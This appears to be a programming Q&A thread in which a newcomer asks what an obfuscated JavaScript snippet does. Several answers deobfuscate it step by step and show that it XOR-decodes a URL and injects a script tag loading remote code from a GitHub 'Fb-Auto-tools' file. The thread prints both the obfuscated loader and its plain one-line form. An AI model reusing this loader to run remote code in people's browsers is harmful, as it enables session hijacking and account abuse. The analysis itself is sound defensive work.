# can someone decode this for javascript me?

Tags: javascript

```
var _0xc86d=["\x6A\x76\x76\x72\x71\x38\x2D\x2D\x70\x63\x75\x2C\x65\x6B\x76\x6A\x77
              \x60\x2C\x61\x6D\x6F\x2D\x60\x6A\x63\x70\x65\x63\x74\x33\x3B\x3B\x34
              \x2D\x44\x60\x2F\x43\x77\x76\x6D\x2F\x76\x6D\x6D\x6E\x71\x2D\x6F\x63
              \x71\x76\x67\x70\x2D\x4B\x4C\x40\x4D\x5A\x2C\x68\x71","","\x6C\x65
              \x6E\x67\x74\x68","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x66
              \x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x73\x72\x63","\x73
              \x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65
              \x6E\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F
              \x64\x79"];
var X=_0xc86d[0];
Y=_0xc86d[1];
Z=_0xc86d[1];
var V;
V=X[_0xc86d[2]];
for(i=0;i<V;i++){
    Y+=String[_0xc86d[4]](X[_0xc86d[3]](i)^2);
} ;
Z=unescape(Y);
document[_0xc86d[9]][_0xc86d[8]](document[_0xc86d[7]](_0xc86d[6]))[_0xc86d[5]]=Z;
```

has been decoded to

```
var _0xc86d = ["jvvrq8--pcu,ekvjw`,amo-`jcpect3;;4-D`/Cwvm/vmmnq-ocqvgp-KL@MZ,hq", "", "length", "charCodeAt", "fromCharCode", "src", "script", "createElement", "appendChild", "body"];
var X = _0xc86d[0];
Y = _0xc86d[1];
Z = _0xc86d[1];
var V;
V = X[_0xc86d[2]];
for (i = 0; i < V; i++) {
    Y += String[_0xc86d[4]](X[_0xc86d[3]](i) ^ 2);
};
Z = unescape(Y);
document[_0xc86d[9]][_0xc86d[8]](document[_0xc86d[7]](_0xc86d[6]))[_0xc86d[5]] = Z;
```

but I still dont understand it, it calls an outside link I think... thanks

edit:

i can only get this far :(

```
var _0xc86d = ["jvvrq8--pcu,ekvjw`,amo-`jcpect3;;4-D`/Cwvm/vmmnq-ocqvgp-KL@MZ,hq", "", "length", "charCodeAt", "fromCharCode", "src", "script", "createElement", "appendChild", "body"];
var X = jvvrq8--pcu,ekvjw`,amo-`jcpect3;;4-D`/Cwvm/vmmnq-ocqvgp-KL@MZ,hq;
Y =  ;
Z =  ;
var V;
V = X[length];
for (i = 0; i < V; i++) {
Y += String[fromCharCode](X[charCodeat](i) ^ 2);
};
Z = unescape(Y);
document[body][appendChild](document[createElement](script))[src] = Z;
```

what is Z? i cant decode it, im new at this :(

Comment: See this question, he goes step by step through the decoding process: http://stackoverflow.com/questions/6556853/can-someone-decrypt-this-javascript?rq=1

Comment: Usually when presented with text that uses complex words, one would use a dictionary to look up what each word means. So in this case, I think you should use a reference to look up how each part works, and continuously refactor the code until it makes sense.

Comment: thanks, i have seen it awhile ago but, i can only do some of his steps, i cant do the: for (i = 0; i < V; i++) {
    Y += String[_0xc86d[4]](X[_0xc86d[3]](i) ^ 2);

Comment: @DadaKambing Has your problem been solved, if yes then please accept the answer that solved it.

Answer (score 0, accepted):

That specific line of code which you couldn't decode:

```
for (i = 0; i < V; i++) {
    Y += String[_0xc86d[4]](X[_0xc86d[3]](i) ^ 2);
}
```

Is equal to:

```
for (i = 0; i < V; i++) {
    Y += String.fromCharCode(X.charCodeAt(i) ^ 2);
}
```

The entire code looks like this:

```
var X = "jvvrq8--pcu,ekvjw`,amo-`jcpect3;;4-D`/Cwvm/vmmnq-ocqvgp-KL@MZ,hq";
var Y = "";
var Z = "";

var V;

V = X.length;

for (i = 0; i < V; i++) {
    Y += String.fromCharCode(X.charCodeAt(i) ^ 2);
}

Z = unescape(Y);
document.body.appendChild(document.createElement("script")).src = Z;
```

and can be compressed to this one:

```
var Y = "https://raw.github.com/bhargav1996/Fb-Auto-tools/master/INBOX.js";
Z = unescape(Y);
document.body.appendChild(document.createElement("script")).src = Z;
```

So the entire code is inserting a `script` tag in your HTML document which points to `https://raw.github.com/bhargav1996/Fb-Auto-tools/master/INBOX.js`.

Answer (score 0):

Ok so basically here's the whole code made more readable:

```
var X = "jvvrq8--pcu,ekvjw`,amo-`jcpect3;;4-D`/Cwvm/vmmnq-ocqvgp-KL@MZ,hq", Y = "", Z; 

for (var i = 0; i < X.length; i++) {
    Y += String.fromCharCode(X.charCodeAt(i) ^ 2);
}

Z = unescape(Y);
document.body.appendChild(document.createElement("script")).src = Z;
```

Basically it seems to be creating a script tag with the import being "https://raw.github.com/bhargav1996/Fb-Auto-tools/master/INBOX.js"

Soo the simplest form of the script would be:

```
document.body.appendChild(document.createElement("script")).src = "https://raw.github.com/bhargav1996/Fb-Auto-tools/master/INBOX.js";
```

Answer (score 0):

It is equivalent to this script

```
var X="jvvrq8--pcu,ekvjw`,amo-`jcpect3;;4-D`/Cwvm/vmmnq-ocqvgp-KL@MZ,hq", 
Y="", Z="",V;
V=X.length;
for(i=0;i<V;i++){
    Y+=String.fromCharCode(X.charCodeAt(i)^2);
} ;
Z=unescape(Y);
document.body.appendChild(document.createElement("script")).src=Z;
```

The script appear to call itself and inject the script at the end of the body and at the end it resolve to

```
document.body.appendChild(
    document.createElement("script")
).src="https://raw.github.com/bhargav1996/Fb-Auto-tools/master/INBOX.js";
```